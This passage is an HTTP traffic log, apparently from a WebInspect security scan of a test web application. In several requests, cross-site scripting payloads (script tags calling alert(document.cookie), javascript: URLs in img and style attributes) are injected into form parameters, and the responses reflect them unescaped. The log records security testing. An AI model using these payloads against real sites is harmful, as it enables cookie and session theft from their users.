<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /forgot2.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:49 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1657
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
GET /cookietest/ShowCookies.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/cookietest/SetCookies.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:22 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 223
Content-Type: text/html
Cache-control: private
<html>
<body>
SessionID = 5<br>
Cookie:Keyed Key:Var1=First Value<br>
Cookie:Keyed Key:Var2=Second Value<br>
Second=Oatmal Chocolate<br>
FirstCookie=Chocolate Chip<br>
CustomCookie=WebInspect<br>
</body>
</html>GET /login/login.asp?Action=Login&UserName=test@<script>alert(document.cookie)</script>.com&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:53:54 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 371
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: test@<script>alert(document.cookie)</script>.com</h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/link14/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:32 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /join.asp?name=>"><script>alert('XSS')</script>&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=1"style="background:url(javascript:alert('XSS'))"%20"&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:27 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /_vti_log/DocURL.indexOf( HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_log/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:46 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 154
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=>"'><img%20src="javascript:alert('XSS')">&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:36 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=--><script>alert('XSS')</script>&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
